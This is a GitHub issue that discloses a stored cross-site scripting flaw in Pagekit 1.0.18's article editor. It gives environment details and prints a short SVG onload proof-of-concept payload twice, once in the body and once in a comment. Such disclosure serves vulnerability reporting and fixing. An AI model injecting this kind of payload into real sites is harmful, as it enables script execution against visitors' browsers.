Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is an XSS vulnerability in the place where the article is edited #968

Open
BreakALegCml opened this issue Jul 20, 2022 · 1 comment

Comments

@BreakALegCml
Copy link

Problem

An attacker can insert a constructed statement into the article. When a user visits this page, it will trigger (XSS) cross site scripting attack

xss

EXP

<svg/onrandom=random onload=confirm(1)>
1
2

Technical Details

  • Pagekit version:1.0.18.
  • Webserver:apache2.4.39
  • Database:5.7.26
  • PHP Version:7.4.3
@BreakALegCml
Copy link
Author

##EXP
<svg/onrandom=random onload=confirm(1)>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant